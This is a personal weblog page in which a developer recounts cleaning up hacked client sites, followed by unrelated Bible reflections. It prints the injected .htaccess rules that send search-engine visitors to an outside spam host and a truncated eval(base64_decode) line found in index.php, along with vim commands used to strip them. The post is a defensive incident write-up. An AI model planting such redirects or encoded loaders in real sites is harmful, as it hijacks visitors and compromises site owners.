Mr. Bob's Weblog

I’m behind on a lot of stuff. Sure, I could write about it now, or complain. But now, after a nap and spending some time with God. Now I’d rather do it to the Lord and get it done on time (sort of).

For the past year, I was worried about keeping this thing going. It’s a good thing, and I’d like for it to stay online.

All I have to do is write a post. Done!

Today, I got an email from not a client, but a user of a client’s site telling me something was wrong.

Hearing that isn’t good.

So I combed through the code to see what it could be and found the problem. It seemed the following code was being placed into the .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4¶meter=sf [R,L]


….and this code within index.php files:


< ?php eval(base64_decode("JGw9**bla bla bla bla**")); ?>


That was nasty. Fortunately, it only broke that one site I was contacted about. At first, I thought it wa that my FTP account was hacked or something. However, I found that someone else was having this problem too, and at the same time (or at least 10 or so hours earlier). His post was helpful in helping me not blame myself and see what the situation was as a whole.

After I finished fixing the one site and reading that blog post, I started combing through the other directories. Here’s what I noticed:

• in each directory, I noticed that the index.php and .htaccess were infected with this code. To check and see if other files had problems as well, I listed all the files in my FTP program by it’s modified date, as shown below:
  
• Only sites in my /domains directory that were affected had either Horde, WordPress, Drupal, or Modx installed. Even installations that did not have a public URL.
• I used the following search and replace commands in vim to help out:
  For index.php:
  
%s/eval(base64_decode("JGw9**bla-bla-bla-bla**"));//g

  For .htaccess:
  
.,$s/.*//g

  Warning: This deletes everything after the line it is run on! I could not find a suitable way to include the malicious code into search and replace (it was late), but this helped by going to the top of where the malicious code starts, and running it that way.

That’s enough for now. Some kids my age go out and party. I just fix security issues that arise.

Wherein I suffer trouble, as an evil doer, even unto bonds; but the word of God is not bound.

-2 Timothy 2:9 (WEB|KJV)

What a powerful statement. God’s Word is limitless!

The words of the LORD are pure words: as silver tried in a furnace of earth, purified seven times. Thou shalt keep them, O LORD, thou shalt preserve them from this generation for ever.

– Psalm 12:6 (KJV|WEB)

Sometimes, when reading the Bible (also known as the word of God), I come across one of those “sticky” parts, i.e. where something seems to stand out or look strange or funny.

For some reason, there seems to be this attitude in the world that if find something that look funny or out of sync in the Bible, you’re supposed to either a) ignore it entirely or b) say the Bible is false; both are wrong. Actually, the more I “question” the Word (with an open ear to God of course), I end up believing it more than I probably would have without investigating it.

Ask, and it shall be given you; seek, and ye shall find; knock, and it shall be opened unto you.

How great is it that God opens the door to us when we knock. So go ahead, knock.
Matt. 7:7 – American Standard Version (ASV)